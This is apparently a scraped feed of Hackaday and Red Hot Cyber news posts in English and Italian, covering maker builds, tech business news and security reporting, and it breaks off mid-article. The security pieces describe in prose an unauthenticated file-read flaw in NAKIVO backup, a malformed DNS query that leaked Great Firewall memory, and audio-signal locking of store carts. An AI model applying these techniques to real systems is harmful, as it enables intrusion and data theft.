Unlike Nerf’s own rocket launchers, this build doesn’t just launch a bigger foam dart. Instead, it launches an advanced smart projectile that releases lots of smaller foam submunitions at a set distance after firing.

The rocket launcher itself is assembled out of off-the-shelf pipe and 3D printed components. An Arduino Uno runs the show, hooked up to a Bluetooth module and a laser rangefinder. The rangefinder determines the distance to the target, and the Bluetooth module then communicates this to the rocket projectile itself so it knows when to release its foamy payload after launch. Releasing the submunitions is achieved with a small microservo in the projectile which opens a pair of doors in flight, scattering foam on anyone below. The rockets are actually fired via strong elastic bands, with an electronic servo-controlled firing mechanism.

We’ve featured some great Nerf builds over the years, like this rocket-blasting robot.

youtube.com/embed/umT7IicqUl4?…

hackaday.com/2025/03/01/buildi…

Mozilla ha modificato la sua politica sulla privacy, rimuovendo la promessa di non vendere mai i dati personali degli utenti di Firefox.

Il fatto

In precedenza nelle FAQ dell’azienda era la seguente : “No. Non l’abbiamo mai fatto e non lo faremo mai. E ti proteggiamo da molti degli inserzionisti che lo fanno. I prodotti Firefox sono progettati per proteggere la tua privacy. È una promessa.”

Ora questa è una dichiarazione scomparsa e la nuova sezione sulla privacy afferma che Mozilla non fa più promesse così ampie. L’azienda spiega questo fatto con il fatto che in alcune giurisdizioni il termine “vendita di dati” viene interpretato in modo troppo ampio.

Mozilla afferma che non vende i dati nel modo più usuale del termine ma è costretta a condividere alcune informazioni con i partner. L’azienda afferma che tali dati vengono resi anonimi, aggregati o elaborati tramite tecnologie che migliorano la privacy.

Gli utenti reagiscono: “Questo è inaccettabile”

A seguito dell’aggiornamento dei termini di servizio, gli utenti hanno espresso la loro insoddisfazione nelle discussioni su Guida in linea E Reddit . Erano particolarmente preoccupati per il punto, secondo cui Inserendo le proprie informazioni in Firefox, gli utenti concedono automaticamente all’azienda una licenza gratuita e mondiale per il loro utilizzo.

Mozilla sotto pressione da parte dei critici ha poi corretto la formulazione : i termini ora chiariscono che la licenza è richiesta solo per il funzionamento del browser e non conferisce all’azienda la proprietà dei contenuti dell’utente. Tuttavia, molti utenti sono rimasti insoddisfatti. Uno di loro notato : “Non si tratta di una questione di formulazione. Non possiamo pretendere dagli utenti diritti così ampi sui loro dati.”

Inoltre, Mozilla riconosce di condividere le parole chiave delle query di ricerca con i partner, compresi i dati sulla posizione, ma assicura che lo fa in forma anonima. L’azienda sottolinea che gli utenti possono disattivare questa funzione nelle impostazioni di Firefox.

Molti però non hanno creduto alle spiegazioni dell’azienda. Un utente ha risposto al commento di Mozilla: “Questa è una totale assurdità e lo sai. La funzionalità di base di un browser è caricare e visualizzare le pagine web.”

L'articolo Mozilla Ci Ripensa: Ora Può Vendere i Tuoi Dati Personali? proviene da il blog della sicurezza informatica.

Il mese scorso il Segretario alla Difesa degli Stati Uniti, Pete Hegseth, ha ordinato al Cyber ​​Command degli Stati Uniti di sospendere ogni pianificazione di operazioni contro la Russia, compresi gli attacchi informatici offensivi. Lo hanno riferito tre fonti a conoscenza della situazione.

Hegseth ha trasmesso l’ordine al capo del Cyber ​​Command, il generale Timothy Ho, che a sua volta lo ha trasmesso al direttore delle operazioni uscente, il maggiore generale dei Marines Ryan Heritage. Secondo le fonti , la decisione non riguarda la National Security Agency (NSA), di cui Ho è anche a capo, e il suo lavoro di intelligence sui segnali contro la Russia.
Generale Timothy D. Ho
La mossa rientra negli sforzi della Casa Bianca per normalizzare i rapporti con Mosca, dopo che gli Stati Uniti e i loro alleati hanno cercato di isolare il Cremlino a causa del conflitto con l’Ucraina. La scorsa settimana Trump ha incontrato Zelensky a Washington per firmare un accordo che garantirebbe agli Stati Uniti l’accesso alle risorse minerarie ucraine. Tuttavia, l’accordo fallì dopo un’accesa discussione nello Studio Ovale.

La durata dell’ordine di Hegseth rimane sconosciuta, ma il Cyber ​​Command è stato informato che le restrizioni rimarranno in vigore a tempo indeterminato. Heritage, conoscendo tutte le operazioni di comando, deve ora comunicare l’ordine alle unità appropriate, tra cui alla 16th Air Force Cyber ​​Command, responsabile delle operazioni digitali nell’area del Comando Europeo degli Stati Uniti.

Il Cyber ​​Command sta attualmente preparando un rapporto di valutazione dei rischi per Hegseth, che dovrebbe includere un elenco delle operazioni annullate e delle potenziali minacce provenienti dalla Russia.

Se le restrizioni si applicassero solo alle unità impegnate in operazioni informatiche contro Mosca, sarebbero colpite centinaia di specialisti della Cyber ​​National Mission Force e della Cyber ​​Mission Force. Tuttavia, se colpissero anche le unità di intelligence e gli analisti, allora ne risentirebbero migliaia di dipendenti, compresi gli specialisti della NSA.

L’ordine di Hegseth coincide con gli sforzi del Cyber ​​Command per intensificare gli sforzi contro i cartelli della droga messicani, otto dei quali sono stati recentemente designati dall’amministrazione Trump come organizzazioni terroristiche.

Alti funzionari della Casa Bianca chiedono un’azione militare aggressiva contro i cartelli per frenare il flusso di droga negli Stati Uniti.

L'articolo Stop Attacchi Informatici Contro la Russia! L’US Cyber Command è Stato Bloccato proviene da il blog della sicurezza informatica.

Nel mondo della tecnologia, pochi nomi evocano tanta nostalgia quanto Skype. Eppure, dopo due decenni di onorato servizio, Microsoft ha deciso di spegnere per sempre la piattaforma che ha rivoluzionato la comunicazione digitale nei primi anni 2000. A partire da maggio, Skype “non sarà più disponibile”, ha confermato l’azienda su X, invitando gli utenti a migrare su Microsoft Teams, il suo servizio di comunicazione in continua espansione.

Dall’innovazione alla dimenticanza

Skype è stato un pioniere, un software capace di abbattere i costi delle chiamate internazionali e di connettere il mondo con una semplicità fino ad allora inimmaginabile. Nato in Estonia nel 2003, il servizio si diffuse rapidamente, tanto da attirare l’attenzione di eBay, che lo acquistò nel 2005 per 2,6 miliardi di dollari. Tuttavia, il matrimonio tra l’e-commerce e la telefonia VoIP non funzionò, e nel 2009 eBay vendette la sua quota di maggioranza a un consorzio di investitori per 1,9 miliardi di dollari.

Nel 2011, Microsoft entrò in scena con un’acquisizione mastodontica: 8,5 miliardi di dollari in contanti per portare Skype nella propria scuderia. Una mossa che, all’epoca, sembrava destinata a consolidare la posizione di Redmond nel settore delle comunicazioni. Tuttavia, col passare degli anni, il marchio Skype ha iniziato a perdere appeal.

Cosa succederà agli utenti Skype?

Per chi ancora utilizza Skype, Microsoft ha previsto un periodo di transizione fino a maggio 2025. Gli utenti potranno trasferire contatti, cronologia chat e crediti direttamente su Teams, utilizzando le stesse credenziali. Inoltre, fino alla chiusura definitiva, Skype e Teams continueranno a essere interoperabili, permettendo agli utenti di comunicare tra loro indipendentemente dalla piattaforma scelta.

Chi non desidera passare a Teams potrà invece scaricare ed esportare la propria cronologia delle chat prima della chiusura. Per quanto riguarda gli abbonamenti a Skype e il credito telefonico, Microsoft garantirà il trasferimento su Teams, in modo da non penalizzare gli utenti che ancora utilizzano il servizio per chiamate internazionali.

Un declino annunciato

Nonostante un temporaneo rilancio durante la pandemia, quando videoconferenze e chiamate online divennero la norma, Skype ha dovuto affrontare una concorrenza spietata. Zoom, Google Meet, WebEx, Apple FaceTime e WhatsApp hanno gradualmente eroso il suo dominio, offrendo alternative più moderne e integrate con i rispettivi ecosistemi. Nel frattempo, Microsoft ha concentrato sempre più risorse su Teams, integrandolo con Microsoft 365 e puntando sul mercato aziendale.

La chiusura di Skype rappresenta la fine di un’era, ma anche una lezione importante: nel mondo della tecnologia, l’innovazione è una corsa senza fine, e persino i giganti possono finire nel dimenticatoio se non riescono ad adattarsi ai cambiamenti del mercato.

Per chi ha utilizzato Skype nei suoi anni d’oro, il suo addio segna un momento di nostalgia. Ma per Microsoft, questo è solo un altro passo verso un futuro in cui Teams è destinato a dominare il settore delle comunicazioni digitali.

L'articolo Skype Addio Per Sempre! Microsoft chiude il pioniere delle videocall dopo 20 anni di servizio proviene da il blog della sicurezza informatica.

Nickel contamination can render soils infertile at levels that are currently impractical to treat. Researchers at UMass Amherst are looking at how plants can help these soils and source nickel for the growing EV market.

Phytoremediation is the use of plants that preferentially hyperaccumulate certain contaminants to clean the soil. When those contaminants are also critical materials, you get phytomining. Starting with Camelina sativa, the researchers are looking to enhance its preference for nickel accumulation with genes from the even more adept hyperaccumulator Odontarrhena to have a quick-growing plant that can be a nickel feedstock as well as produce seeds containing oil for biofuels.

Despite being able to be up to 3% Ni by weight, Odontarrhena was ruled out as a candidate itself due to its slow-growing nature and that it is invasive to the United States. The researchers are also looking into what soil amendments can best help this super Camelina sativa best achieve its goals. It’s no panacea for expected nickel demand, but they do project that phytomining could provide 20-30% of our nickel needs for 50 years, at which point the land could be turned back over to other uses.

Recycling things already in technical cycles will be important to a circular economy, but being able to remove contaminants from the environment’s biological cycles and place them into a safer technical cycle instead of just burying them will be a big benefit as well. If you want learn about a more notorious heavy metal, checkout our piece on the blessings and destruction wrought by lead.

youtube.com/embed/zYB-DlEtFdE?…

hackaday.com/2025/02/28/phytor…

Lego! It’s a fun toy that is popular around the world. What you may not realize is that it’s also made to incredibly high standards. As it turns out, the humble building blocks are good enough to build a interferometer if you’re so inclined to want one. [Kyra Cole] shows us how it’s done.

The build in question is a Michelson interferometer; [Kyra] was inspired to build it based on earlier work by the myphotonics project. She was able to assemble holders for mirrors and a laser, as well as a mount for a beamsplitter, and then put it all together on a Lego baseboard. While some non-Lego rubber bands were used in some areas, ultimately, adjustment was performed with Lego Technic gears.

Not only was the Lego interferometer able to generate a proper interference pattern, [Kyra] then went one step further. A Raspberry Pi was rigged up with a camera and some code to analyze the interference patterns automatically.

[Kyra] notes that using genuine Lego bricks was key to her success. Their high level of dimensional accuracy made it much easier to achieve her end goal. Sloppily-built knock-off bricks may have made the build much more frustrating to complete.

We don’t feature a ton of interferometer hacks around these parts. However, if you’re a big physics head, you might enjoy our 2021 article on the LIGO observatory. If you’re cooking up your own physics experiments at home, don’t hesitate to drop us a line!

[Thanks to Peter Quinn for the tip!]

hackaday.com/2025/02/28/buildi…

River tables are something we’ve heard decried as a passé, but we’re still seeing some interesting variations on the technique. Take this example done with bronze instead of epoxy.

Starting with two beautiful slabs of walnut, [Burls Art] decided that instead of cutting them up to make guitars he would turn his attention to a river table to keep them more intact. Given the price of copper and difficulty in casting it, he decided to trim the live edges to make a more narrow “river” to work with for the project.

Since molten copper is quite toasty and wood likes to catch on fire, he wisely did a rough finish of the table before making silicone plugs of the voids instead of pouring metal directly. The silicone plugs were then used to make sand casting molds, and a series of casting trials moving from copper to bronze finally yielded usable pieces for the table. In case that all seems too simple, there were then several days of milling and sanding to get the bronze and walnut level and smooth with each other. The amount of attention to detail and plain old elbow grease in this project is impressive.

We’ve seen some other interesting mix-ups of the live edge and epoxy formula like a seascape night light or this river table with embedded neon. And if you’re looking to get into casting, why not start small in the microwave?

youtube.com/embed/slu4A4L0bqo?…

hackaday.com/2025/02/28/a-diff…

If you’ve ever seen those cheap LED fiber optic wands at the dollar store, you’ve probably just thought of them as a simple novelty. However, as [Ancient] shows us, you can turn them into a surprisingly nifty little display if you’re so inclined.

The build starts by removing the fiber optic bundle from the wand. One end is left as a round bundle. At the other end, the strands are then fed into plastic frames to separate them out individually. After plenty of tedious sorting, the fibers are glued in place in a larger rectangular 3D-printed frame, which holds the fibers in place over a matrix of LEDs. The individual LEDs of the matrix light individual fibers, which carry the light to the round end of the bundle. The result is a tiny little round display driven by a much larger one at the other end.

[Ancient] had hoped to use the set up for a volumetric display build, but found it too fragile to be fit for purpose. Still, it’s interesting to look at nonetheless, and a good demonstration of how fiber optics work in practice. As this display shows, you can have two glass fibers carrying completely different wavelengths of light right next to each other without issue.

We’ve featured some other great fiber optic hacks over the years, like this guide on making your own fiber couplings. Video after the break.

youtube.com/embed/zz59e1wWyVc?…

[Thanks to Zane and Darryl and Ash for the tip! This one was all over the tipsline!]

hackaday.com/2025/02/28/cheap-…

Fluid simulations are a key tool in fields from aerospace to motorsports and even civil engineering. They can be three-dimensional and complicated and often run on supercomputer clusters bigger than your house. However, you can also do simple two-dimensional fluid simulations on very simple hardware, as [mircemk] demonstrates.

This build is almost like a simple toy that displays particles rolling around and tumbling as you turn it one way or the other. Behind the scenes, an ESP32 is running the show, simulating a group of particles responding to gravity in a fluid-like manner. The microcontroller is hooked up with an 3-axis gyroscope and accelerometer, which it uses to track motion and influence the motion of the particles in turn. The results of the simple fluid simulation are displayed on a screen made up of a 16 x 16 matrix of WS2812B addressable RGB LEDs, which add enough color to make the build suitably mesmerizing.

There’s something compelling about turning the display and watching the particles tumble and flow, particularly when they’re all set to different colors. [mircemk] also gave the build the ability to operate in several different modes, running “sand,” “liquid” and “gas” simulations and with dynamic coloring to boot.

We’ve seen some great videos from [mircemk] before, too, like this sensitive metal detector rig.

youtube.com/embed/AwRup7wAijU?…

hackaday.com/2025/02/28/low-re…

The original locking wheel.
Shopping carts are surprisingly expensive. Prices range up to about $300 for a cart, which may seem like a lot, but they have to be pretty rugged and are made to work for decades. Plastic carts are cheaper, but not by much.

And carts have a way of vanishing. We’ve seen estimates that cart theft costs hundreds of millions of dollars worldwide annually. To stem the tide, stores sometimes pay a reward to people to round up carts off the street and return them to the store — it’s cheaper than buying a new one. That led [Elmer Isaacks] to patent a solution to this problem in 1968.

The [Isaacks] system used lots of magnets. A cart leaving the store had a brake that would be armed by running over a magnet. Customers were expected to follow a path surrounded by magnets to prevent the brake from engaging. If you left the track, a rod passing through the wheel locked it.

A third magnet would disarm the brake when you entered the store again. This is clever, but it has several problems. First, you have to insert magnets all over the place. Second, if someone knows how the system works, a simple magnet will hold the brake off no matter what.
The original modern-style court from a 1946 paten
There are some low-tech ways to stop theft, too. For example, if the store has barriers too narrow for the carts to pass, customers can’t leave the store. That’s not very nice if you are trying to get a week’s worth of stuff to your car. You sometimes see poles on carts rising taller than the door, to prevent the cart from leaving the building, which, of course, has the same problem.

Some stores, particularly Aldi, require a small deposit to get a cart. You get the deposit back when you return the cart. This not only discourages theft but also cuts down on having to hire kids to round up carts in the parking lot. The problem is that the deposit is usually a low-denomination coin, so if you really want to steal a $200 shopping cart, losing a quarter is probably not much of a deterrent.

Higher Tech

Building on the [Isaacks] solution, more modern systems use a perimeter fence — usually a wire, but sometimes magnets — that causes the brake to engage if you roll the cart over it.

This drives the cost up and is expensive to install. Worse, if you only have one wheel lock, a smart customer could lift that wheel off the ground and bypass the virtual fence. That means you probably want two locking wheels, although that still doesn’t preclude a strong thief or two thieves from carrying the cart over the line. You can see a breakdown of what’s happening in the Science Channel video below.

youtube.com/embed/PWZOeM5jdjg?…

Smart cart locks can also help solve “pushout,” an industry term for people filling a cart and walking out without paying. A properly equipped cart can determine if it exits the store without going through a checkout line. This is probably error-prone and not foolproof, but it might stop many pushouts.

youtube.com/embed/e7KzPQrzY-c?…

Where’s the Hack?

Many common carts use 7.8 kHz signals on the sensing wire. Since that’s within the range of audio, you can actually hack them pretty easily.

A DEFCON presentation shows how you can use your phone to lock and unlock shopping carts. Not that we suggest you do that. As [Joseph Gabay] notes: “I never really wanted a shopping cart, but…I have the knowledge that if I wanted a shopping cart, I could have one.” His video below shows many of the internal details of some of the common shopping cart systems.

youtube.com/embed/fBICDODmCPI?…

Who Knew?

You’d think a shopping cart was about the simplest thing you’d deal with all day. But, like many things these days, it conceals some very high-tech electronics. And it seems like there should be some better options. Locking wheels might be fine when you have someone actually stealing, but if you ever have a cart lock up while you are moving quickly, it isn’t pleasant.

If you become super interested in shopping carts, the National Museum of American History has a section of shopping carts. Why not? People get obsessed with strange things. If the modern system seems familiar, maybe you are thinking of invisible doggie fences. If you want to hack a cart, you probably want to buy your own to start with.

Featured image: “Large Capacity Shopping Cart” from the National Museum of American History collection.

hackaday.com/2025/02/28/tech-i…

This week, Hackaday’s Elliot Williams and Kristina Panos met up in a secret location with snacks to bring you the latest news, mystery sound, and of course, a big bunch of hacks from the previous week.

First up in the news, and there’s a lot of it: we announced the Hackaday Europe 2025 workshops and a few more speakers, though the big keynote announcement is still to come. In case you missed it, KiCad 9 moved up into the pro league, and finally, we’re hiring, so come join us in the dungeon.

On What’s That Sound, Kristina didn’t get close at all, but at least had a guess this time. That’s okay, though, because nobody got it right! We’re still giving a t-shirt away to [Dakota], though, probably because Elliot has a thing for using random number generators.

Then it’s on to the hacks and such beginning with a beautiful handheld compass CNC and cyanotype prints made with resin printer’s UV light. After that, we take a look at open-source random numbers, a 3D-printed instant camera, and a couple of really cool cyberdecks. Finally, we discuss whether DOOM is doomed as the port of choice in this day and age, and kvetch about keyboards.

Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!

html5-player.libsyn.com/embed/…

Download in DRM-free MP3 and savor at your leisure.

Where to Follow Hackaday Podcast

Places to follow Hackaday podcasts:

• iTunes
• Spotify
• Stitcher
• RSS
• YouTube
• Check out our Libsyn landing page

Episode 310 Show Notes:

News:

• Hackaday Europe 2025: Workshops And More Speakers
• KiCad 9 Moves Up In The Pro League
• We’re Hiring: Come Join Us!

What’s that Sound?

• Congrats to [Dakota] who drew lucky number 13 and a Hackaday Podcast t-shirt!

Interesting Hacks of the Week:

• Handheld Compass CNC Lets Teensy Do The Driving
  
  • Hands-On The Shaper Origin: A Tool That Changes How We Build

  
  

• Cyanotype Prints On A Resin 3D Printer
  
  • Using A Potato As Photographic Recording Surface

  
  

• Open-Source Random Numbers
• 3D Print An Instant Camera
• Harvesting Water With High Voltage
• A Precisely Elegant Cyberdeck Handheld

Quick Hacks:

• Elliot’s Picks:
  
  • Pico Gets A Speed Bump
  • A Web-Based Graphics Editor For Tiny Screens
  • To Test A (Smart) LED
  • Import GPU: Python Programming With CUDA
  • SHOUT For Smaller QR Codes

  
  

• Kristina’s Picks:
  
  • 3D Print Yourself A Split Flap Display
  • The Perfect Pi Pico Portable Computer
  • Infill Injection Experiment Makes Stronger Parts

  
  

Can’t-Miss Articles:

• What Game Should Replace Doom As The Meme Port Of Choice?
• Keebin’ With Kristina: The One With All The Green Keyboards

hackaday.com/2025/02/28/hackad…

[Kelly Coffield] makes intake manifolds for old Ford throttle bodies for fun, demonstrating an excellent technique for making such things in the small shop. The mould patterns are CNC machined from a solid polystyrene block, with all the necessary gates to feed the aluminium into the mould. The principle is to introduce aluminium from a large central runner into the mould structure, which feeds the gates into the mould parts. The various foam mould components are then glued with an extra brace bar at the bottom to strengthen it.
Dip coating with a refractory slurry
The complete structure is then sprayed with surfactant (just plain old soapy water) and dip-coated in a refractory slurry. The surfactant adjusts the coating’s surface tension, preventing bubbles from forming and ruining the surface quality produced by this critical coating step.

Once a satisfactory coating has been applied and hardened, the structure is placed inside a moulding pan fitted with a pneumatic turbine vibrator, to allow sand to be introduced. The vibrations ease the flow of sand into all the nooks and crannies, fully supporting the delicate mould structure against the weight of the metal, and gases produced as the foam burns away. A neat offset pouring cup is then added to the top of the structure and packed in with more sand to stabilise it. It’s a simple setup that can easily be replicated in any hackerspace or backyard for those motivated enough. [Kelly] is using A356 aluminium alloy, but there’s no reason this technique won’t work for other metals.

It was amusing to see [Kelly] demould by just dumping out the whole stack onto the drive and throwing the extracted casting into a snow bank after quenching. We might as well use all that free Midwest winter cooling capacity! After returning to the shop, [Kelly] would typically perform any needed adjustments, such as improving flatness in the press, while the part was in the ‘as cast temper’ condition. We’ll gloss over the admission of cutting the gates off on the table saw! After these adjustments, the part is artificially aged to a T5-like specification, to give it its final strength and machinability properties. There are plenty more videos on this process on the channel, which is well worth a look.

Aluminium casting is nothing new here, here’s a simple way to cast using a 3D printed pattern. But beware, casting aluminum can be hazardous, it does like to burn.

youtube.com/embed/zxFAhnvXzys?…

Thanks to [Chuck] for the tip!

hackaday.com/2025/02/28/lost-f…

It’s usually not a good sign when your downloaded theme contains obfuscated code. Yes, we’re talking about the very popular Material Theme for VSCode. This one has a bit of a convoluted history. One of the authors wanted to make some money from all those downloads. The original Material Theme was yanked from the VSCode store, the source code (improperly) re-licensed as closed source, and replaced with freemium versions. And this week, those freemium versions have been pulled by Microsoft for containing malware.

Now there’s a quirk to this story. No one has been able to answer a simple yet vital question: What exactly did the theme plugin do that was malicious? The official response is that “A theming extension with heavily obfuscated code and unreasonable dependencies including a utility for running child processes”. Looking at the official statements and unofficial security reviews, I can’t find confirmation that the plugins have actually been observed doing something malicious. The only concrete problem is that the plugin shipped obfuscated JavaScript. There are several incomplete statements about a problem with a sanity.io dependency that may have been compromised.

The conclusion at this point is that a thorough security review of these plugins has not been published. The Microsoft team found enough problematic elements in the plugins to trigger pulling them. But I join the chorus of voices calling on Microsoft to clearly answer the vital question: Have any users of Material Theme plugins actually been compromised?

Low-hanging Backups

NAKIVO backup has an interesting endpoint, the getImageByPath call that’s used for loading the system’s logo, and is accessible for unauthenticated users. It’s pretty simple, just taking a path to a file on the appliance filesystem, and returning the byte array for use as an image. And of course, it doesn’t check whether the requested file is actually an image. Nor is it limited to a list of allowed paths.

So hence we essentially have an arbitrary file read. It’s not entirely arbitrary, as the file is first loaded into memory before being served. So the backups themselves are likely too big to successfully exfiltrate in this way. There are still some rather interesting targets, including the system logs. But the real juicy target is the system database itself. Thankfully, the user credentials for the NAVIKO system itself seem to be properly hashed to avoid casual theft. But setting up useful backups will require all sorts of integrations, like SSH and AWS credentials. And those are stored in plain text inside the database. Whoops.

Apple Did What?

A couple weeks ago we talked about Apple and the UK government having a tussle over iCloud backup encryption. Apple has finally rolled out end-to-end encryption for those backups, and the UK’s Snooper’s Charter has been used to require Apple to add an encryption backdoor in that system. That’s problematic for multiple reasons, and Apple has opted to not quietly oblige the UK government. You may have seen headlines that Apple has pulled access to the new Advanced Data Protection (ADP) for UK users. This seems to be the next step of anti-compliance with the new UK rule.

The logic here seems to be that not offering any end-to-end encrypted backup system for UK users is a better choice than claiming to offer such a system that actually contains a backdoor. That’s doubly true, as the law in question doesn’t seem to limit itself to UK users. If the UK government doesn’t back down on their extremely questionable demands, the next major step may be for Apple to pull sales from the country entirely.

Crypto Heist

We have a pair of crypto heist stories this week, with the first one being the largest in history. At a staggering $1.5 Billion, this seems like the biggest single theft of any kind to ever be successfully pulled off. And the details of how it was done are still a bit murky. The funds were stolen out of a Bybit “multisig” cold wallet. Those are clever currency stores that actually include smart contracts in the storage mechanism, requiring multiple owners to sign off on transactions.

It’s believed that this hack was pulled off by North Korean agents, through the use of very clever but simple techniques: Social engineering, and UI manipulation. In essence, a request for digital signature that claimed to do something benign, that actually unlocked the funds for theft. Some things never seem to change.

And that’s not all that’s happening with Cryptocurrency these days. It turns out that there’s another dead-simple attack that is targeting job-seeking individuals, instead of huge companies. “We may have a job for you, go to this website and run this application to apply!” Rather than a legitimate videoconferencing or interviewing application, the download is a simple backdoor. It’s used primarily to find crypto wallets and siphon the funds out.

Wallbleed

Remember Heartbleed? That’s the glitch in OpenSSL from 2014, where the TLS heartbeat implementation could trivially leak large amounts of system memory. Wallbleed is a strangely similar bug in the implementation of the Chinese Great Firewall system. One way the Great Firewall does censorship is via DNS injection. Request the DNS information for a blocked domain, and the firewall will intercept that request in real time, and return a spoofed response with a bogus IP address for the requested domain. Importantly for this discussion, that spoofing is bi-directional. You can send DNS requests to Chinese IP addresses, and get spoofed responses from the Great Firewall.

DNS request and response packets use an interesting variable length transport system, where the domain name being requested is turned into a set of length-value pairs. example.com is represented as 07example03com00. 7 bytes for the domain, then 3 bytes for the TLD, and a terminating null. Many of us are immediately wondering, what happens if that query was packed incorrectly: 07example20com00? There aren’t actually 20 bytes in the query, so what do various DNS responders do when handed such a query? Well-written DNS servers recognize that this is garbage, and just drop the packet. Some of the great firewall infrastructure did something far more interesting. It spoofs the DNS response, and performs a buffer over-read when constructing the response. Yes, leaking a few bytes of raw system memory back to the requester, a la Heartbleed.

And when we say “a few bytes”, the maximum observed leakage in a single spoofed response was 125. As you might imagine, that’s quite a bit of data. Enough data, in fact, to learn quite a bit about the Great Firewall and what sort of traffic it sees. There were also what appeared to be x86_64 pointers and Linux stack frames.

This attack was first discovered by researchers in 2021 and finally completely fixed in March 2024. In the intermediate time, those researchers used the vulnerability quite heavily to mine the Great Firewall infrastructure for data. This is an interesting ethical question. Normally it’s considered completely unacceptable to weaponize a vulnerability beyond what’s needed as a proof of concept. The Great Firewall is in some ways an adversarial device, making exploitation a bit murkier. On the other hand, vulnerabilities like this a usually disclosed in order to get them fixed. What is a researcher’s responsibility in this case, when the vulnerability is in a censorship device? It seems the Chinese authorities discovered the Wallbleed vulnerability themselves, excusing researchers from needing to fully answer this particular ethical question.

Bits and Bytes

It’s not surprising to open up an electronic device, and find an ugly glob of potting compound spread over one or several of the key chips inside. Or for some devices, the compound is ubiquitous, covering everything. [Graham Sutherland] has some thoughts on how to defeat the stuff. And while some is obvious, like using a drill press to very carefully expose a target interface, there are some really inventive ideas I would never have considered, like throwing an entire board into a pressure cooker for an hour!

How long does it take for a cyber criminal to go from initial access on an internal machine, to full access to a privileged computer? In the ReliaQuest case, it was 48 minutes. The hack was simple and clever. Start a mass spam and phishing campaign, and then pose as a helpful IT worker who could help end the carnage. All it takes is one employee to fall for the fake help desk routine, and 48 minutes.

Let’s say you wanted to pirate music from a streaming service like Deezer, but you really didn’t want your IP address or machine associated with the piracy. What would you do? Use Tor? VPNs? How about create a malicious PyPi package that does your downloading for you. That seems to be the bizarre case of automslc, a reasonably popular package that secretly downloads and scrapes from the music platform.

hackaday.com/2025/02/28/this-w…

Microsoft ha rimosso due estensioni popolari, Material Theme – Free e Material Theme Icons – Free, da Visual Studio Marketplace, in quanto sospettate di contenere codice dannoso.

In totale, queste estensioni sono state scaricate quasi 9 milioni di volte e ora gli utenti ricevono avvisi che indicano che le estensioni sono state disattivate automaticamente. Il loro editore, Mattia Astorino (alias equinusocio), ha diverse altre estensioni nel Visual Studio Marketplace, con un totale complessivo di oltre 13 milioni di installazioni.

Le informazioni secondo cui le estensioni potrebbero essere dannose provengono dai ricercatori di sicurezza informatica Amit Assaraf e Itay Kruk. Nel loro rapporto gli esperti hanno affermato di aver trovato codice sospetto nelle estensioni e di aver segnalato le loro scoperte a Microsoft.

I ricercatori sottolineano che il codice dannoso è stato iniettato nell’estensione tramite un aggiornamento, il che potrebbe indicare un attacco alla supply chain tramite una dipendenza o una compromissione dell’account dello sviluppatore.

Un altro campanello d’allarme era la presenza di codice JavaScript fortemente offuscato nei file release-notes.js.

“Microsoft ha rimosso entrambe le estensioni dal marketplace di VS Code e bannato il loro sviluppatore”,ha detto un dipendente Microsoft a YCombinator. — Uno dei membri della community ha effettuato un’analisi approfondita della sicurezza di queste estensioni e ha trovato molti “segnali d’allarme” che indicavano intenti malevoli, per poi segnalarcelo. I ricercatori di sicurezza Microsoft hanno confermato queste affermazioni e hanno trovato ulteriore codice sospetto. Abbiamo bandito l’editore da VS Marketplace, rimosso tutte le sue estensioni e disinstallato tutte le istanze di VS Code che eseguivano tali estensioni. Per essere chiari, la rimozione non ha nulla a che fare con il copyright o con la licenza, ma solo con potenziali intenti malevoli”. Microsoft ha promesso di pubblicare a breve informazioni più dettagliate sull’attività dannosa nel repository VSMarketplace su GitHub.

Lo sviluppatore dell’estensione, Mattia Astorino, ha risposto alle domande sui potenziali pericoli delle estensioni affermando che i problemi erano causati da una dipendenza obsoleta di sanity.io che “sembra essere compromessa”. Secondo lui, non c’è mai stato nulla di dannoso nel Material Theme e l’unico problema era una dipendenza obsoleta di sanity.io, “che veniva utilizzata per visualizzare le note di rilascio del CMS headless sanity”.

“Questa dipendenza esiste dal 2016 e ha superato con successo tutti i controlli, ma ora sembra compromessa. Nessuno di Microsoft ci ha contattato per rimuoverlo. Hanno appena distrutto tutto, causando problemi a milioni di utenti e causando il blocco di VSCode (sì, è colpa loro). Hanno rotto tutto senza mai chiederci spiegazioni, scrive Astorino. — Rimuovere la vecchia dipendenza è stato un lavoro da 30 secondi, ma sembra che sia così che funziona Microsoft. Inoltre, forniamo un file index.js offuscato che contiene tutti i comandi e la logica del tema. È offuscato perché l’estensione è ora closed source. Se la rimuovi, l’estensione continuerà a funzionare con i normali file JSON.”

Finché la situazione non sarà chiarita, si consiglia agli utenti di rimuovere i seguenti file da tutti i progetti:

• equinusocio.moxer-theme;
• equinusocio.vsc-material-theme;
• equinusocio.vsc-material-theme-icons;
• equinusocio.vsc-community-material-theme;
• equinusocio.moxer-icons.

L'articolo Cybercrime contro gli sviluppatori VS Code: 9 milioni di utenti a rischio dopo la rimozione delle estensioni proviene da il blog della sicurezza informatica.

Se pensavate che la cybersecurity riguardasse solo i dati digitali, ecco una realtà ben più inquietante: 49.000 sistemi di controllo accessi (AMS) sono stati trovati esposti online, senza protezioni adeguate, mettendo a rischio la sicurezza fisica di edifici governativi, infrastrutture critiche e aziende in tutto il mondo.

Un’esposizione pericolosa

Esempi di sistemi di controllo accessi. Immagine dal sito Modat
Secondo i ricercatori di Modat, questi AMS gestiscono l’accesso a strutture sensibili attraverso badge, sistemi biometrici e riconoscimento targhe. Tuttavia, le configurazioni errate di migliaia di dispositivi hanno lasciato le porte digitali spalancate, consentendo a chiunque di visualizzare e persino manipolare dati sensibili come:

• Nomi, email e numeri di telefono degli impiegati
• Dati biometrici come impronte digitali e riconoscimento facciale
• Fotografie personali
• Orari di lavoro e registri di accesso ai locali

E non è tutto: in alcuni casi, i ricercatori sono riusciti a modificare i record degli impiegati, creare utenti fittizi e alterare le credenziali di accesso, rendendo possibili scenari da film di spionaggio, in cui un attaccante potrebbe impedire l’ingresso a personale autorizzato o, peggio, concederlo a intrusi.

Italia in prima fila nell’esposizione

Posizione dei dispositivi AMS esposti. Immagine dal sito Modat
A livello globale, i numeri sono allarmanti, ma c’è un dato che fa riflettere ancora di più: il paese con il maggior numero di AMS esposti è l’Italia, con ben 16.678 dispositivi vulnerabili. Seguono il Messico (5.940) e il Vietnam (5.035), mentre negli Stati Uniti il numero si attesta a 1.966.

Danni oltre la sicurezza fisica

